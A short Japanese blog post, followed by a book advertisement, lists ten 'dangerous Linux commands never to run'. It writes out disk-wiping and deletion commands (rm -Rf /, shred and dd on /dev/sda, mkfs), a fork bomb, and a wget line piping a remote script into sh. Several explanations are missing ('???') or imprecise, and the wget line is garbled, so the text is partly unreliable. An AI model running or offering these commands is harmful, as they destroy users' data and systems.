internet

以前、Linuxの魔のコマンドとして「rm -rf /」を紹介させていただきましたが、これ以外にも危険なコマンドが紹介されていましたので下記に紹介します。

rm -Rf /
システム内のファイルを全て削除
shred /dev/sda
システムファイルを完全削除
dd if=/dev/random of=/dev/sda
システムファイルをランダムに上書き
mkfs.ext4 /dev/sda1
ディスクをフォーマット
mv / /dev/null
ルートを上書き
:(){:|:&};:
再帰的に自システムを呼び出す
wget http://unknownsource.com/possiblydangerous.sh -O- | sh -O- | sh
???
gunzip untrusted.gz
巨大ファイルを作り、システムを圧迫
command > file.conf
???
^mistake^correction
???

いくつかよくわからないものがありますが、もし、わかる方は下記コメント等に書いていただけると幸です。

実行してはいけない危険なLinuxコマンド10選 | マイナビニュース

[改訂第3版]Linuxコマンドポケットリファレンス

著者/訳者:沓名 亮典

出版社:技術評論社( 2015-06-05 )

定価:

Amazon価格:¥ 2,570

単行本(ソフトカバー) ( 608 ページ )

ISBN-10 : 4774174041

ISBN-13 : 9784774174044